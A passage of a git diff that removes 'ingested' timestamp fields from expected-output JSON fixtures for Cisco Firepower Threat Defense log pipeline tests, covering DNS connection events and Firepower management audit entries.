b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json @@ -84,7 +84,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102284679Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70", "code": "430003", "kind": "event", @@ -227,7 +226,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102292760Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299", "code": "430003", "kind": "event", @@ -372,7 +370,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102293845Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", "code": "430003", "kind": "event", @@ -515,7 +512,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102294720Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12", "code": "430003", "kind": "event", @@ -660,7 +656,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102295481Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error", "code": "430003", "kind": "event", @@ -804,7 +799,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102296211Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658", "code": "430003", "kind": "event", @@ -947,7 +941,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102296960Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", "code": "430003", "kind": "event", @@ -1093,7 +1086,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102297696Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", "code": "430003", "kind": "event", @@ -1236,7 +1228,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102298431Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", "code": "430003", "kind": "event", @@ -1380,7 +1371,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102299195Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", "code": "430003", "kind": "event", @@ -1525,7 +1515,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102299937Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused", "code": "430003", "kind": "event", @@ -1664,7 +1653,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102300866Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure", "code": "430003", "kind": "event", @@ -1805,7 +1793,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102301681Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900", "code": "430003", "kind": "event", @@ -1949,7 +1936,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102302506Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694", "code": "430003", "kind": "event", @@ -2092,7 +2078,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102303301Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946", "code": "430003", "kind": "event", @@ -2236,7 +2221,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102304063Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", "code": "430003", "kind": "event", @@ -2381,7 +2365,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102304938Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", "code": "430003", "kind": "event", @@ -2524,7 +2507,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102305698Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", "code": "430003", "kind": "event", @@ -2667,7 +2649,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102306437Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", "code": "430003", "kind": "event", @@ -2809,7 +2790,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102307187Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59", "code": "430003", "kind": "event", @@ -2951,7 +2931,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:02.102307941Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", "code": "430003", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json index bd1014bfef8..e281d76290b 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json @@ -28,7 +28,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.197117196Z", "original": "Jan 1 2019 01:00:27 beats asa[1234]: %FTD-7-999999: This message is not filtered.", "code": "999999", "kind": "event", @@ -72,7 +71,6 @@ }, "event": { "severity": 8, - "ingested": "2021-12-29T10:00:14.197119669Z", "original": "Jan 1 2019 01:00:30 beats asa[1234]: %FTD-8-999999: This phony message is dropped due to log level.", "code": "999999", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json index 46d0510c120..f6f0a02e1c5 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json @@ -26,7 +26,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593757348Z", "original": "\u003c14\u003eAug 14 2019 13:56:30 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=AuditLog, Page View\u0000x0a\u0000x00", "code": "" }, @@ -63,7 +62,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593762198Z", "original": "\u003c14\u003eAug 14 2019 13:57:19 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=Banner, Page View\u0000x0a\u0000x00", "code": "" }, @@ -100,7 +98,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593763958Z", "original": "\u003c14\u003eAug 14 2019 13:57:26 ChangeReconciliation.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/ChangeReconciliation.cgi, Page View\u0000x0a\u0000x00", "code": "" }, @@ -137,7 +134,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593765407Z", "original": "\u003c14\u003eAug 14 2019 13:57:34 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=IntrusionPolicyPrefs, Page View\u0000x0a\u0000x00", "code": "" }, @@ -174,7 +170,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593766800Z", "original": "\u003c14\u003eAug 14 2019 13:57:43 lights_out_mgmt.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /admin/lights_out_mgmt.cgi, Page View\u0000x0a\u0000x00", "code": "" }, @@ -211,7 +206,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593772024Z", "original": "\u003c14\u003eAug 14 2019 13:58:02 mojo_server.pl: siem-management: admin@10.0.255.31, Cloud Services, View url filtering settings\u0000x0a\u0000x00", "code": "" }, @@ -248,7 +242,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593773575Z", "original": "\u003c14\u003eAug 14 2019 13:58:02 mojo_server.pl: siem-management: admin@10.0.255.31, Cloud Services, View amp settings\u0000x0a\u0000x00", "code": "" }, @@ -285,7 +278,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593775033Z", "original": "\u003c14\u003eAug 14 2019 13:58:20 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Syslog, Page View\u0000x0a\u0000x00", "code": "" }, @@ -322,7 +314,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593776597Z", "original": "\u003c14\u003eAug 14 2019 13:58:41 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management, Page View\u0000x0a\u0000x00", "code": "" }, @@ -359,7 +350,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593777966Z", "original": "\u003c14\u003eAug 14 2019 13:58:47 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Interfaces, Page View\u0000x0a\u0000x00", "code": "" }, @@ -396,7 +386,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593779269Z", "original": "\u003c14\u003eAug 14 2019 13:58:52 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Device Summary, Page View\u0000x0a\u0000x00", "code": "" }, @@ -433,7 +422,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593780849Z", "original": "\u003c14\u003eAug 14 2019 13:58:54 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Device Summary, Page View\u0000x0a\u0000x00", "code": "" }, @@ -470,7 +458,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593782283Z", "original": "\u003c14\u003eAug 14 2019 13:59:10 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings, Page View\u0000x0a\u0000x00", "code": "" }, @@ -507,7 +494,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593783804Z", "original": "\u003c14\u003eAug 14 2019 13:59:15 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, @@ -544,7 +530,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593785228Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Save Policy ftd-policy\u0000x0a\u0000x00", "code": "" }, @@ -581,7 +566,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593786599Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Modified: Syslog\u0000x0a\u0000x00", "code": "" }, @@ -618,7 +602,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593787956Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, @@ -655,7 +638,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593789320Z", "original": "\u003c14\u003eAug 14 2019 14:01:12 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Save Policy ftd-policy\u0000x0a\u0000x00", "code": "" }, @@ -692,7 +674,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593790656Z", "original": "\u003c14\u003eAug 14 2019 14:01:12 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Modified: Syslog\u0000x0a\u0000x00", "code": "" }, @@ -729,7 +710,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593791864Z", "original": "\u003c14\u003eAug 14 2019 14:01:13 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, @@ -766,7 +746,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593793175Z", "original": "\u003c14\u003eAug 14 2019 14:01:20 sfdccsm: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, @@ -803,7 +782,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593794621Z", "original": "\u003c14\u003eAug 14 2019 14:01:31 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, @@ -840,7 +818,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593796069Z", "original": "\u003c14\u003eAug 14 2019 14:01:31 ActionQueueScrape.pl: siem-management: admin@localhost, Task Queue, Successful task completion : Pre-deploy Global Configuration Generation\u0000x0a\u0000x00", "code": "" }, @@ -877,7 +854,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593797530Z", "original": "\u003c14\u003eAug 14 2019 14:01:35 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, @@ -914,7 +890,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593798960Z", "original": "\u003c14\u003eAug 14 2019 14:01:36 ActionQueueScrape.pl: siem-management: admin@localhost, Task Queue, Successful task completion : Pre-deploy Device Configuration for siem-ftd\u0000x0a\u0000x00", "code": "" }, @@ -951,7 +926,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593800370Z", "original": "\u003c14\u003eAug 14 2019 14:01:55 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration, Page View\u0000x0a\u0000x00", "code": "" }, @@ -988,7 +962,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593802021Z", "original": "\u003c14\u003eAug 14 2019 14:01:56 sfdccsm: siem-management: admin@localhost, Task Queue, Policy Deployment to siem-ftd - SUCCESS\u0000x0a\u0000x00", "code": "" }, @@ -1025,7 +998,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593802924Z", "original": "\u003c14\u003eAug 14 2019 14:01:57 sfdccsm: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, @@ -1062,7 +1034,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593803990Z", "original": "\u003c14\u003eAug 14 2019 14:02:03 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Syslog, Page View\u0000x0a\u0000x00", "code": "" }, @@ -1099,7 +1070,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593804887Z", "original": "\u003c14\u003eAug 14 2019 14:02:11 index.cgi: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Audit, Page View\u0000x0a\u0000x00", "code": "" }, @@ -1136,7 +1106,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593805808Z", "original": "\u003c14\u003eAug 14 2019 14:02:19 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration, Page View\u0000x0a\u0000x00", "code": "" }, @@ -1173,7 +1142,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593806705Z", "original": "\u003c14\u003eAug 14 2019 14:02:31 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=AuditLog, Page View\u0000x0a\u0000x00", "code": "" }, @@ -1210,7 +1178,6 @@ }, "event": { "severity": 7, - "ingested": "2021-12-29T10:00:14.593807615Z", "original": "\u003c14\u003eAug 14 2019 14:02:38 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Local System Configuration, Save Local System Configuration\u0000x0a\u0000x00", "code": "" }, @@ -1248,7 +1215,6 @@ }, "event": { "severity": 7, - "ingested": 